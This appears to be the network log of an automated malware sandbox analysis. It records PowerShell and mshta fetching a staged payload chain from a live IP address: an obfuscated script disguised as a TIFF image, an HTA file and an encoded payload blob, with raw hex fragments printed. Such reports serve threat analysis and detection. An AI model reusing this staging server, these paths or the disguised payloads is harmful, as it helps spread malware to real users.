                                                                                                                                                                                Nov 25, 2024 14:06:41.846681118 CET1236INData Raw: 36 46 25 32 35 36 41 25 32 35 36 32 25 32 35 35 41 25 32 35 36 34 25 32 35 34 42 25 32 35 36 36 25 32 35 36 37 25 32 35 35 34 25 32 35 35 32 25 32 35 36 44 25 32 35 37 35 25 32 35 36 42 25 32 35 34 43 25 32 35 36 46 25 32 35 37 38 25 32 35 35 35
                                                                                                                                                                                Data Ascii: 6F%256A%2562%255A%2564%254B%2566%2567%2554%2552%256D%2575%256B%254C%256F%2578%2555%2573%2546%2563%2579%2549%254C%2555%254A%2563%254C%254A%256B%2564%256E%2541%2548%2573%254D%2570%2555%2554%2543%2552%2544%2574%2556%2548%254F%2559%2544%2579%256B%
                                                                                                                                                                                Nov 25, 2024 14:06:41.846693039 CET1236INData Raw: 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25
                                                                                                                                                                                Data Ascii: 0%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2
                                                                                                                                                                                Nov 25, 2024 14:06:41.846710920 CET1236INData Raw: 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32
                                                                                                                                                                                Data Ascii: %2520%2520%2520%2520%2520%2520%2520%253D%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%25
                                                                                                                                                                                Nov 25, 2024 14:06:41.846723080 CET1236INData Raw: 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35
                                                                                                                                                                                Data Ascii: 2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%252
                                                                                                                                                                                Nov 25, 2024 14:06:41.846736908 CET1236INData Raw: 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32
                                                                                                                                                                                Data Ascii: 520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520
                                                                                                                                                                                Nov 25, 2024 14:06:41.971766949 CET1236INData Raw: 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30
                                                                                                                                                                                Data Ascii: 20%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                2192.168.2.2249165172.234.205.135803760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 25, 2024 14:06:48.600948095 CET391OUTGET /1244/creatgoodideaforfuturebusinessdevelopwithnicethingsgetbackon.tIF HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                Host: 172.234.205.135
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Nov 25, 2024 14:06:49.776225090 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                Date: Mon, 25 Nov 2024 13:06:49 GMT
                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                Last-Modified: Mon, 25 Nov 2024 11:41:21 GMT
                                                                                                                                                                                ETag: "22bb4-627bb36316c8e"
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Content-Length: 142260
                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: image/tiff
                                                                                                                                                                                Data Raw: ff fe 0d 00 0a 00 0d 00 0a 00 6f 00 65 00 63 00 4c 00 4c 00 69 00 4c 00 57 00 57 00 4e 00 69 00 57 00 6a 00 65 00 4c 00 20 00 3d 00 20 00 22 00 7a 00 5a 00 5a 00 7a 00 43 00 47 00 49 00 57 00 72 00 57 00 64 00 4c 00 4b 00 71 00 50 00 22 00 0d 00 0a 00 47 00 71 00 75 00 49 00 50 00 57 00 68 00 6f 00 47 00 5a 00 68 00 50 00 69 00 4c 00 50 00 20 00 3d 00 20 00 22 00 6b 00 74 00 7a 00 5a 00 71 00 78 00 4b 00 7a 00 41 00 47 00 67 00 4e 00 62 00 42 00 4c 00 22 00 0d 00 0a 00 63 00 67 00 70 00 6a 00 50 00 50 00 4e 00 68 00 4b 00 75 00 71 00 65 00 4c 00 6b 00 74 00 20 00 3d 00 20 00 22 00 57 00 41 00 53 00 68 00 57 00 49 00 7a 00 4c 00 63 00 63 00 4b 00 68 00 74 00 50 00 7a 00 22 00 0d 00 0a 00 78 00 43 00 57 00 5a 00 71 00 6f 00 4c 00 69 00 6b 00 73 00 50 00 6d 00 47 00 69 00 71 00 20 00 3d 00 20 00 22 00 57 00 4b 00 50 00 4c 00 4c 00 4f 00 57 00 64 00 6e 00 47 00 70 00 4b 00 4c 00 70 00 57 00 22 00 0d 00 0a 00 62 00 69 00 71 00 78 00 47 00 4b 00 47 00 53 00 6d 00 63 00 55 00 69 00 4c 00 54 00 4b 00 20 00 [TRUNCATED]
                                                                                                                                                                                Data Ascii: oecLLiLWWNiWjeL = "zZZzCGIWrWdLKqP"GquIPWhoGZhPiLP = "ktzZqxKzAGgNbBL"cgpjPPNhKuqeLkt = "WAShWIzLccKhtPz"xCWZqoLiksPmGiq = "WKPLLOWdnGpKLpW"biqxGKGSmcUiLTK = "GWcKLLnnkNAGthA"PilheWRAcKLLHkp = "KAWImePxLeWiWau"UuiLiLLLWhmpbZj = "qAeivhLtBKAhmGx"LbWooezLvGGkpLL = "dKaKWuuzLozfcle"PpGfzizQGGlkLnu = "fiWpZWomlchJQxc"WqpLJLnWhQcUeiP = "iHhfkWGNWiLWzPi"dWzchuRZmWZWWlA = "SLtHWmJieWNkePc"ditKmqxWqLjKKLi = "LdIKGpokLqhcojm"LWqPHqbt
                                                                                                                                                                                Nov 25, 2024 14:06:49.776268959 CET1236INData Raw: 00 6e 00 65 00 73 00 57 00 67 00 68 00 66 00 20 00 3d 00 20 00 22 00 4f 00 57 00 4e 00 57 00 53 00 55 00 4f 00 5a 00 41 00 57 00 57 00 4b 00 53 00 6d 00 47 00 22 00 0d 00 0a 00 6c 00 75 00 4b 00 6f 00 6e 00 74 00 50 00 4a 00 50 00 65 00 6d 00 65
                                                                                                                                                                                Data Ascii: nesWghf = "OWNWSUOZAWWKSmG"luKontPJPemeoBJ = "ieLifecAWGilHxm"LOiKdhpCkbzLzoP = "nKeCLiclNTZCcCm"pKpLhKKjmalinensec
                                                                                                                                                                                Nov 25, 2024 14:06:49.776281118 CET1236INData Raw: 00 22 00 41 00 63 00 69 00 67 00 4b 00 61 00 42 00 64 00 4b 00 69 00 4c 00 4e 00 57 00 62 00 62 00 22 00 0d 00 0a 00 6b 00 55 00 6d 00 6b 00 6f 00 64 00 64 00 69 00 66 00 68 00 52 00 57 00 41 00 6b 00 57 00 20 00 3d 00 20 00 22 00 69 00 57 00 4c
                                                                                                                                                                                Data Ascii: "AcigKaBdKiLNWbb"kUmkoddifhRWAkW = "iWLPmalinenseRfOCpBexL"iWckKGNzqHKiaHq = "kbiQGJlWkWWUdWU"fpBKWRtgpAoKKcd = "
                                                                                                                                                                                Nov 25, 2024 14:06:49.776381016 CET1236INData Raw: 00 65 00 22 00 0d 00 0a 00 69 00 51 00 6e 00 69 00 68 00 4c 00 63 00 4f 00 47 00 68 00 52 00 69 00 7a 00 4b 00 71 00 20 00 3d 00 20 00 22 00 6e 00 4c 00 4c 00 57 00 4b 00 78 00 4e 00 69 00 68 00 6b 00 69 00 5a 00 4f 00 57 00 75 00 22 00 0d 00 0a
                                                                                                                                                                                Data Ascii: e"iQnihLcOGhRizKq = "nLLWKxNihkiZOWu"OxqeWLdNpGWLzhL = "ALBneALKiifQWat"pbOKaOLoWIKfJLg = "KSmAKmTZUiLcqxk"fAKcfb
                                                                                                                                                                                Nov 25, 2024 14:06:49.776401997 CET1236INData Raw: 00 69 00 6e 00 65 00 6e 00 73 00 65 00 6c 00 78 00 61 00 6e 00 4c 00 67 00 66 00 66 00 62 00 63 00 69 00 66 00 20 00 3d 00 20 00 22 00 4b 00 4b 00 4b 00 54 00 7a 00 71 00 75 00 47 00 4c 00 4b 00 51 00 48 00 69 00 4b 00 57 00 22 00 0d 00 0a 00 66
                                                                                                                                                                                Data Ascii: inenselxanLgffbcif = "KKKTzquGLKQHiKW"fhxUIKohiBuWkge = "liWWBBiKOLLKLKe"eLbahaUpJcnnKCL = "bCqmKlzGcmtWdfi"WuNbifW
                                                                                                                                                                                Nov 25, 2024 14:06:49.776415110 CET1236INData Raw: 00 42 00 4c 00 50 00 4f 00 6b 00 4f 00 6d 00 47 00 6b 00 41 00 41 00 6f 00 47 00 72 00 4c 00 20 00 3d 00 20 00 22 00 41 00 4b 00 52 00 57 00 48 00 62 00 69 00 4c 00 62 00 4b 00 75 00 67 00 4c 00 66 00 4c 00 22 00 0d 00 0a 00 70 00 6f 00 73 00 6d
                                                                                                                                                                                Data Ascii: BLPOkOmGkAAoGrL = "AKRWHbiLbKugLfL"posmGqcpeiPfRTK = "IQbmLzhmANpkGmW"iKNfizzWxAbLpKx = "BkkmWNcWGLKKzGW"xaiofnUu
                                                                                                                                                                                Nov 25, 2024 14:06:49.776427984 CET776INData Raw: 00 20 00 3d 00 20 00 22 00 65 00 73 00 69 00 57 00 4b 00 6c 00 57 00 57 00 66 00 4b 00 62 00 66 00 66 00 4b 00 6c 00 22 00 0d 00 0a 00 4a 00 41 00 41 00 50 00 4c 00 63 00 4c 00 4e 00 54 00 66 00 55 00 69 00 6b 00 57 00 55 00 20 00 3d 00 20 00 22
                                                                                                                                                                                Data Ascii: = "esiWKlWWfKbffKl"JAAPLcLNTfUikWU = "lLLCOmAxbgOxPnf"LiiihLWGrGhUWIP = "kGekmUcnQkWLBhW"hClTKRhbiZnCILG = "LoUkjK
                                                                                                                                                                                Nov 25, 2024 14:06:49.776436090 CET1236INData Raw: 00 6b 00 4c 00 43 00 4c 00 63 00 6f 00 50 00 4b 00 6a 00 63 00 22 00 0d 00 0a 00 71 00 65 00 6c 00 61 00 69 00 70 00 74 00 69 00 43 00 6b 00 6c 00 7a 00 4c 00 4a 00 63 00 20 00 3d 00 20 00 22 00 67 00 6e 00 57 00 63 00 47 00 4e 00 50 00 42 00 6b
                                                                                                                                                                                Data Ascii: kLCLcoPKjc"qelaiptiCklzLJc = "gnWcGNPBktLLxkG"idKWKiLaWPPmaWb = "WARNZmWUmKviCRq"JkNKcxzfiLLNgco = "mhRihjckfzfLuWt
                                                                                                                                                                                Nov 25, 2024 14:06:49.776451111 CET1236INData Raw: 00 63 00 63 00 43 00 68 00 66 00 41 00 20 00 3d 00 20 00 22 00 7a 00 6d 00 4e 00 78 00 65 00 4f 00 4b 00 52 00 69 00 48 00 61 00 57 00 57 00 50 00 55 00 22 00 0d 00 0a 00 4f 00 69 00 57 00 65 00 57 00 64 00 65 00 41 00 4c 00 48 00 6f 00 47 00 41
                                                                                                                                                                                Data Ascii: ccChfA = "zmNxeOKRiHaWWPU"OiWeWdeALHoGAiS = "fqzioZcLoGiKKNc"ihfoWxkPBcPWuiW = "jltiqlWUOetiops"kKuWWovkLSfrzib = "
                                                                                                                                                                                Nov 25, 2024 14:06:49.776463985 CET1236INData Raw: 00 63 00 6b 00 67 00 63 00 4c 00 66 00 4b 00 51 00 22 00 0d 00 0a 00 57 00 64 00 57 00 47 00 6e 00 76 00 7a 00 55 00 48 00 6d 00 5a 00 70 00 4e 00 6b 00 4c 00 20 00 3d 00 20 00 22 00 4b 00 68 00 64 00 72 00 67 00 4c 00 7a 00 4b 00 71 00 66 00 6e
                                                                                                                                                                                Data Ascii: ckgcLfKQ"WdWGnvzUHmZpNkL = "KhdrgLzKqfnniWG"PbWvclKzPhuWLmalinense = "LvmvPzvGbmWiGvA"mzGWefbbWPcULPL = "QItiJfLiWu
                                                                                                                                                                                Nov 25, 2024 14:06:49.896557093 CET1236INData Raw: 00 22 00 0d 00 0a 00 61 00 69 00 6e 00 54 00 72 00 6b 00 69 00 64 00 4b 00 63 00 6e 00 47 00 70 00 74 00 4b 00 20 00 3d 00 20 00 22 00 41 00 63 00 63 00 57 00 69 00 4c 00 63 00 4c 00 47 00 57 00 68 00 4c 00 43 00 42 00 62 00 22 00 0d 00 0a 00 64
                                                                                                                                                                                Data Ascii: "ainTrkidKcnGptK = "AccWiLcLGWhLCBb"dnsxqPpPWzxAqKz = "eLfLLksKCOBISuU"KchkWUzZWAWdCLK = "qdPUgkqWSGcWCnc"LnitZdA


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                3192.168.2.2249171172.234.205.135803060C:\Windows\System32\mshta.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 25, 2024 14:07:01.242827892 CET493OUTGET /1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Language: en-US
                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                If-Modified-Since: Mon, 25 Nov 2024 11:44:20 GMT
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Host: 172.234.205.135
                                                                                                                                                                                If-None-Match: "1e074-627bb40d70f1b"
                                                                                                                                                                                Nov 25, 2024 14:07:02.412417889 CET275INHTTP/1.1 304 Not Modified
                                                                                                                                                                                Date: Mon, 25 Nov 2024 13:07:02 GMT
                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                Last-Modified: Mon, 25 Nov 2024 11:44:20 GMT
                                                                                                                                                                                ETag: "1e074-627bb40d70f1b"
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                Connection: Keep-Alive


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                4192.168.2.2249173172.234.205.135802116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Nov 25, 2024 14:07:19.815474987 CET80OUTGET /1244/SRVRSR.txt HTTP/1.1
                                                                                                                                                                                Host: 172.234.205.135
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Nov 25, 2024 14:07:20.940093040 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                Date: Mon, 25 Nov 2024 13:07:20 GMT
                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                Last-Modified: Mon, 25 Nov 2024 11:37:43 GMT
                                                                                                                                                                                ETag: "a0800-627bb293020f5"
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Content-Length: 657408
                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 2b 38 67 4e 50 38 79 44 6e 38 77 48 50 59 78 44 54 38 77 43 50 41 73 44 35 37 51 38 4f 6b 75 44 67 37 41 32 4f 38 73 44 48 36 41 76 4f 4d 72 44 72 36 77 6f 4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35 67 66 4f 30 6e 44 6f 7a 51 7a 4d 77 49 44 70 79 41 71 4d 45 4b 44 67 79 77 6e 4d 77 4a 44 57 79 67 6b 4d 34 49 44 4b 79 67 52 4d 6f 48 44 32 78 51 64 4d 51 48 44 7a 78 67 63 4d 45 48 44 77 78 77 62 4d 34 47 44 72 78 67 61 4d 6b 47 44 6f 78 77 5a 4d 59 47 44 6c 78 41 [TRUNCATED]
                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwD+8gNP8yDn8wHPYxDT8wCPAsD57Q8OkuDg7A2O8sDH6AvOMrDr6woOspDR6giOQoDC6QgOAkD/5gfO0nDozQzMwIDpyAqMEKDgywnMwJDWygkM4IDKygRMoHD2xQdMQHDzxgcMEHDwxwbM4GDrxgaMkGDoxwZMYGDlxAZMMGDixgWMkFDYAAAAQCwBAAAAAADHwgAMAAAAAABAGAOAAAwPs/D5/w9PU/D0/g8P0+Dr/g5PQ+Di/A4P89De/Q3Pw9Da/Q2Pc9DS/A0Ps8DJ/wxPU4D8+guPg7D3+AsPg6Dn+AoPg5DQ+AiPA0D49AcPg2Dg9AWPA1DI9AAPgzDw8AKPAyDY8AEPgwDA7A+OAvDo7A4OgtDQ7AyOEsDA6gvOYrDu6gpO4pDW6gjOYkD+5gdO4mDt5gZO4lDX5AVOwkDE4APOQjDs4AJOwhDU4wDO0gDM4gCOggDG4QxN4fD93w8NEfDu3Q5NEeDg3g3NcdDW3A1NwcDL2gvNsbDz2AsN4aDp2wpNYaDl2woNEaDf2gmNgZDX2glNQZDS2AkNsYDJ2AhNIYDB2AQN4XD81geNUXDz1gcNAXDu1AbNsWDk1wYNMVDP1gQNAQD90QONwSDq0wJNMSDW0AFNERDN0AwM4PD7zw9MoODozQ5MEODUzg0M8MDLygvMwLD5yQtMgKDmywoMEKDfygkMAJDNywiMkED8xgeMcHD1xwcMYGDkxQYM0FDQxgTMsEDHwgOMgDAAB
                                                                                                                                                                                Nov 25, 2024 14:07:20.940104961 CET224INData Raw: 67 4a 41 47 41 4e 41 41 41 41 50 77 79 44 6d 38 41 4a 50 4d 79 44 69 38 67 48 50 30 78 44 5a 38 77 45 50 45 78 44 51 38 77 44 50 34 77 44 4e 38 41 44 50 67 77 44 48 38 77 77 4f 30 76 44 37 37 67 2b 4f 6b 76 44 34 37 77 39 4f 59 76 44 79 37 51 38
                                                                                                                                                                                Data Ascii: gJAGANAAAAPwyDm8AJPMyDi8gHP0xDZ8wEPExDQ8wDP4wDN8ADPgwDH8wwO0vD77g+OkvD47w9OYvDy7Q8O0uDn7Q5OQuDj7g4OEuDd7A3OgtDS7A0O8sDO7QzOwsDI7wxOMoD96wuOorD56QtOQrDw6wrOsqDl6woOIqDe6AmOYpDV6AlOMpDP6QiOgoDC6AQO8nD+5QfOwnD45wdOMnDt5waOomDm5
                                                                                                                                                                                Nov 25, 2024 14:07:20.940144062 CET1236INData Raw: 51 5a 4f 45 6d 44 62 35 51 57 4f 67 6c 44 58 35 77 55 4f 49 6c 44 4f 35 41 53 4f 59 6b 44 46 35 41 52 4f 4d 6b 44 43 34 67 50 4f 30 6a 44 35 34 77 4d 4f 45 6a 44 77 34 77 4c 4f 34 69 44 71 34 51 4b 4f 55 69 44 66 34 51 48 4f 77 68 44 59 34 67 45
                                                                                                                                                                                Data Ascii: QZOEmDb5QWOglDX5wUOIlDO5ASOYkDF5AROMkDC4gPO0jD54wMOEjDw4wLO4iDq4QKOUiDf4QHOwhDY4gEOAhDP4gDOogDJ4QxN8fD93A/NsfD63g9NUfDx3w6NkeDo3w5NYeDi3Q4N0dDX3Q1NQdDT3wzN4cDK3AxNIcDB3AgN8bD72guNYbDw2grN0aDs2AqNcaDj2QnNsZDa2glNUZDR2wiNkYDI2AhNMUD91AfNsXD61AZN
                                                                                                                                                                                Nov 25, 2024 14:07:20.940206051 CET1236INData Raw: 31 44 5a 39 77 56 50 55 31 44 54 39 51 55 50 38 30 44 4e 39 77 53 50 6b 30 44 48 39 51 52 50 4d 30 44 42 38 77 50 50 30 7a 44 37 38 51 4f 50 63 7a 44 31 38 77 4d 50 45 7a 44 76 38 51 4c 50 73 79 44 70 38 77 4a 50 55 79 44 6a 38 51 49 50 38 78 44
                                                                                                                                                                                Data Ascii: 1DZ9wVPU1DT9QUP80DN9wSPk0DH9QRPM0DB8wPP0zD78QOPczD18wMPEzDv8QLPsyDp8wJPUyDj8QIP8xDd8wGPkxDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl
                                                                                                                                                                                Nov 25, 2024 14:07:20.940217018 CET1236INData Raw: 77 52 50 59 30 44 45 39 67 41 41 41 41 41 58 41 55 41 73 41 73 44 69 37 51 34 4f 41 75 44 66 37 67 33 4f 30 74 44 63 37 77 32 4f 6f 74 44 5a 37 41 32 4f 63 74 44 57 37 51 31 4f 51 74 44 54 37 67 30 4f 45 74 44 51 37 77 7a 4f 34 73 44 4e 37 41 7a
                                                                                                                                                                                Data Ascii: wRPY0DE9gAAAAAXAUAsAsDi7Q4OAuDf7g3O0tDc7w2OotDZ7A2OctDW7Q1OQtDT7g0OEtDQ7wzO4sDN7AzOssDK7QyOgsDH7gxOUsDE7wwOIsDB7AgO8rD+6QvOwrD76guOkrD46wtOYrD16AtOMrDy6QsOArDv6grO0qDs6wqOoqDp6AqOcqDm6QpOQqDj6goOEqDg6wnO4pDd6AnOspDa6QmOgpDX6glOUpDU6wkOIpDR6AkO
                                                                                                                                                                                Nov 25, 2024 14:07:20.940229893 CET1236INData Raw: 76 44 78 37 77 37 4f 30 75 44 72 37 51 36 4f 63 75 44 6c 37 77 34 4f 45 75 44 66 37 51 33 4f 73 74 44 5a 37 77 31 4f 55 74 44 54 37 51 30 4f 38 73 44 4e 37 77 79 4f 6b 73 44 48 37 51 78 4f 4d 73 44 42 36 77 76 4f 30 72 44 37 36 51 75 4f 63 72 44
                                                                                                                                                                                Data Ascii: vDx7w7O0uDr7Q6OcuDl7w4OEuDf7Q3OstDZ7w1OUtDT7Q0O8sDN7wyOksDH7QxOMsDB6wvO0rD76QuOcrD16wsOErDv6QrOsqDp6wpOUqDj6QoO8pDd6wmOkpDX6QlOMpDR6wjO0oDL6QiOcoDF6wgOEkD/5QfOsnD55wdOUnDz5QcO8mDt5waOkmDn5QZOMmDh5wXO0lDb5QWOclDV5wUOElDP5QTOskDJ5wROUkDD5QAO8jD9
                                                                                                                                                                                Nov 25, 2024 14:07:20.940243959 CET1236INData Raw: 49 34 4f 34 74 6a 62 37 55 32 4f 2b 73 6a 4e 37 38 68 4f 37 72 7a 76 36 45 6f 4f 45 70 44 43 35 6b 66 4f 71 6e 7a 74 35 38 4b 4f 72 6a 7a 34 34 73 4e 4f 54 69 6a 62 34 77 45 4f 6e 67 44 47 34 6b 77 4e 30 55 6a 35 31 34 54 4e 69 51 6a 62 30 45 46
                                                                                                                                                                                Data Ascii: I4O4tjb7U2O+sjN78hO7rzv6EoOEpDC5kfOqnzt58KOrjz44sNOTijb4wEOngDG4kwN0Uj514TNiQjb0EFM1CzrwsJM9BzawYGAAAA8AUAYA8DE+wtPr6TR9oVPL1zP98SPS0jC8AOPZyTe80GPhxTT8E0Ofvz17k7OxuTq7E6OZujS74SOhmzl50WOghj/40OOnjj44wNO+iTt4wKOXizE3o/NyeDo3M5NIeDZ3QzNncTD2IqN
                                                                                                                                                                                Nov 25, 2024 14:07:20.940294027 CET1236INData Raw: 47 44 6d 78 73 47 4d 31 41 41 41 41 77 48 41 45 41 4e 41 2f 49 2f 50 52 2f 54 79 2f 45 37 50 64 36 44 30 2b 45 71 50 78 30 6a 35 39 34 64 50 69 31 7a 57 39 73 42 50 38 79 7a 6a 38 77 45 50 42 78 44 4f 38 51 78 4f 75 76 6a 35 37 63 34 4f 2f 74 7a
                                                                                                                                                                                Data Ascii: GDmxsGM1AAAAwHAEANA/I/PR/Ty/E7Pd6D0+EqPx0j594dPi1zW9sBP8yzj8wEPBxDO8QxOuvj57c4O/tzT74jORqDJ6QQOVnTz5UbOpmjY54UOUgDs4UGOchzU40DOxgzE4sAOAcz93E+NLfDk3U4N8dzS3MkN2aTp2UpNNaDf2wWNrVjF1YANpTTdzA8MZJT0yQoM5JTZygkMREzzx4JMiCzkwcIM3BjWwIFMoAAAAgKAEAMA
                                                                                                                                                                                Nov 25, 2024 14:07:20.940305948 CET776INData Raw: 49 43 4e 58 4d 7a 2b 7a 45 2f 4d 57 50 54 30 7a 77 38 4d 42 50 6a 6a 7a 6f 32 4d 6c 4e 44 59 7a 55 31 4d 34 4d 44 46 79 41 75 4d 2f 4b 7a 70 79 49 71 4d 64 4b 6a 6b 79 41 6f 4d 65 4a 44 55 79 51 6b 4d 31 49 44 48 78 55 66 4d 74 48 6a 31 78 59 63
                                                                                                                                                                                Data Ascii: ICNXMz+zE/MWPT0zw8MBPjjzo2MlNDYzU1M4MDFyAuM/KzpyIqMdKjkyAoMeJDUyQkM1IDHxUfMtHj1xYcMKGjgxUWMgFzWxYQMBAz7wgOMiDz2wELMXCzgwsHMvBjUwgEMlAzGwYAAAEAmAQAcA8T9/M9PJ/Dv/M7PZ+Di/M1PK9TO/0yPS8TA+wsPF7Dm+EZPY3DX9gEPMxTA7E9OguDU7MzOtoz760tOXjz23M7MxPTjxIGM
                                                                                                                                                                                Nov 25, 2024 14:07:20.940319061 CET1236INData Raw: 63 51 4f 39 6e 7a 39 35 67 64 4f 4f 66 6a 32 33 38 38 4e 57 65 54 6a 33 49 79 4e 63 63 6a 46 33 77 67 4e 34 61 44 70 32 34 70 4e 4d 61 44 54 32 45 6a 4e 66 59 6a 44 32 55 51 4e 37 58 7a 38 31 45 65 4e 5a 57 44 6b 31 34 58 4e 33 56 54 44 30 77 50
                                                                                                                                                                                Data Ascii: cQO9nz95gdOOfj2388NWeTj3IyNccjF3wgN4aDp24pNMaDT2EjNfYjD2UQN7Xz81EeNZWDk14XN3VTD0wPN3Tz60YONTTzx0AMNpSzk00HNuRjP0ICNPMD6zItMeKTbyImMHJzIycQM1DzzwELMTCjTAAAA0CABgAAAA8DZ/c1PH9jO+IoPC5DM+MiPY0D99QcP32Tn9IDPyvzT7oTO9gD34IFOIcz83k5NGZTO1sVN4UDCzcPA
